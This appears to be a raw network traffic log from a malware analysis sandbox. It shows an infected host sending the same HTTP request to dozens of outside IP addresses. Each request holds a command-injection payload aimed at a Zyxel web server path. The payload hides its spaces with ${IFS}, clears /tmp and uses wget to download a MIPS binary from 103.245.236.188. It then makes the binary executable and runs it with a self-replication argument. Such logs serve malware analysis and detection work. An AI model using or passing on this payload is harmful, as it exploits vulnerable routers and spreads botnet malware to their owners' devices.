                                                Jan 12, 2024 18:24:46.111143112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7057192.168.2.1351070101.166.133.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111169100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7058192.168.2.134005246.71.163.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111207962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7059192.168.2.1341730120.157.151.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111244917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7060192.168.2.135976464.32.208.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111289024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7061192.168.2.1358736163.244.113.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111334085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7062192.168.2.136067690.112.196.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111351967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7063192.168.2.1344208151.189.196.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111413002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7064192.168.2.134830017.155.41.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111455917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7065192.168.2.1358742187.253.6.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111486912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7066192.168.2.1334774202.112.251.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111537933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7067192.168.2.1332784219.40.175.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111557007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7068192.168.2.1345858124.149.136.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111597061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7069192.168.2.134673034.181.44.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111644030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7070192.168.2.1354446209.4.159.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111681938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7071192.168.2.135259037.17.142.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111712933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7072192.168.2.1352484101.6.73.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111753941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7073192.168.2.1336260103.100.29.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111814976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7074192.168.2.1345482112.247.117.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111839056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7075192.168.2.134609086.96.32.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111881971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7076192.168.2.1356250208.15.8.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111902952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7077192.168.2.135726279.67.40.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111968994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7078192.168.2.13548708.110.195.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.111993074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7079192.168.2.1344008109.167.181.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112031937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7080192.168.2.134961879.218.128.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112073898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7081192.168.2.1357090207.195.187.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112098932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7082192.168.2.135589854.223.36.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112162113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7083192.168.2.1339522202.82.228.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112189054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7084192.168.2.1337704145.68.27.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112225056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7085192.168.2.1350550106.14.134.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112271070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7086192.168.2.13416621.42.35.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112309933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7087192.168.2.1341278137.85.19.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112356901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7088192.168.2.1353258103.105.167.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112373114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7089192.168.2.1358884196.54.192.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112411022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7090192.168.2.1355544163.201.232.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112467051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7091192.168.2.1337710195.61.148.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112493038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7092192.168.2.1359474210.240.165.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112538099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7093192.168.2.1354082100.221.249.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112575054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7094192.168.2.1339712178.35.240.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112627983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7095192.168.2.1342336149.216.149.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112657070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7096192.168.2.1351428203.187.196.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112694979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7097192.168.2.1355194108.124.118.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112737894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7098192.168.2.1348416124.20.223.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112771034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7099192.168.2.134379052.179.159.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112803936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7100192.168.2.1354626177.160.78.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112848997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7101192.168.2.1349986106.241.218.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112890959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7102192.168.2.133956083.187.183.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112930059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7103192.168.2.136028664.68.162.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112953901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7104192.168.2.1334406146.1.203.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.112983942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7105192.168.2.13442464.228.68.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113028049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7106192.168.2.133990044.38.83.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113054037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7107192.168.2.1339666193.155.56.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113087893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7108192.168.2.1337100110.192.17.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113145113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7109192.168.2.1355414223.15.118.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113187075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7110192.168.2.1342730101.116.187.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113215923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7111192.168.2.1339548124.16.130.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113240957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7112192.168.2.1334522137.108.77.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113292933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7113192.168.2.1339678155.237.152.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113331079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7114192.168.2.1346742118.36.19.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113379002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7115192.168.2.1352104185.217.27.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113424063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7116192.168.2.133928458.90.7.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113480091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7117192.168.2.133396834.255.171.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113512039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7118192.168.2.135581431.190.218.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.113565922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7119192.168.2.1359692216.234.242.240443
                                                TimestampBytes transferredDirectionData
